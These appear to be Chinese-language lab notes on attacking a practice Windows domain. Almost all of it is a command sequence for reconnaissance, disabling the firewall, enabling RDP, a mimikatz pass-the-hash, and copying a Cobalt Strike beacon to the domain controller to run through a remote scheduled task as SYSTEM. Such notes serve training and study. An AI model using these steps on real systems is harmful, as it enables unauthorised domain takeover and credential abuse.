- win7 web服务器 192.168.3.125(外)192.168.52.143
- 域成员 192.168.52.141(内)
- 域控 192.168.52.138(内)
1 pth横向移动
通过cs上线的win7-web服务器,利用ntml哈希,获取域控的权限,并上线cs马
(1)域内信息收集
其中win作为web服务器,配置双网卡,使用桥接无线的方式连接外网,但有一个问题,双网卡会影响寻找域控,需要在dns解析文件里增加一行。
文件位置:C:\Windows\System32\drivers\etc
搜集主机信息
whoami
hostname
whoami /all
systeminfo
判断域的存在
net view /domain
net user /domain
net time /domain
nslookup god.org
net config workstation
操作系统信息
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"
echo %PROCESSOR_ARCHITECTURE%
安装的软件和版本、路径信息
wmic product get name,version # 使用wmic操作
powershell "Get-WmiObject -class Win32_Product | Select-Object -Property name,Version" #使用powershell进行操作
查询信息命令
wmic service list brief # 查询本机服务信息
tasklist #查询进程
wmic process list brief #使用wmic查询进程
wmic startup get command,caption #查看启动进程
schtasks /query /fo list /v # 查看计划任务
net statistics workstation # 查看主机开机时间
netstat -ano #查询端口列表
wmic qfe get caption,description,hotfixid,installedon #查询本机安装的补丁
查询机器内账户信息
net user #查看本机用户列表
net localgroup administrators # 获取本地管理员
query user || qwinsta # 获取在线用户
net session # 列出计算机所连接的客户端之间的会话
net share # 查看本机共享列表
wmic share get name,path,status #使用wmic 查询本机共享列表
关闭防火墙
netsh firewall set opmode disable # windows server 2003 之前
netsh advfirewall set allprofiles state off # windows server 2003 之后
开启3389端口
注册表打开:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f #开启的话把0改为1
wmic开启3389:
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
查找域内信息
net view /domain:god # 查看域内所有计算机
net group /domain #查看域内所有用户列表
net group "domain computers" /domain #查看域成员计算机列表
Domain Admins :域管理员
Domain Computers:域内机器
Domain Controllers:域控制器
Domain Guests:域访客
Domain Users:域用户
Enterprise Admins:企业系统管理员
nltest /domain_trusts #获取域信任信息
sltest /DCLIST:god #查看域控制器机器名
net group "domain admins" /domain #查询域管理员用户
net group "Enterprise admins" /domain # 查询管理员用户
(2)哈希传递
-
建立监听
如果用外网起的listen,域控不出网,无法上线
-
查看目录并上传cs马
logonpasswords或者
哈希传递
mimikatz sekurlsa::pth /domain:god.org /user:administrator /ntlm:54c6a15e8136e220426b4f378539d600
54c6a15e8136e220426b4f378539d600
dir \\192.168.52.138\c$
疑问,这个是c盘,还是system32目录
生成新的域控马,放在win7桌面shell文件夹下,名为yukong,exe,使用shell命令行从控制机到域控上传
共享传马
shell copy C:\Users\Administrator\Desktop\shell\yukong.exe \\192.168.52.138\c$
shell schtasks /create /tn "test" /tr C:\yukong.exe /sc once /st 18:26 /S 192.168.52.138 /RU System /u administrator /p "hongrisec@2019"
shell schtasks /delete /s 192.168.52.138 /tn "test" /f
启动计划任务
拿到shell
2 甜点
-
win7的shell文件夹
-
域控的c盘根目录
- cs监听器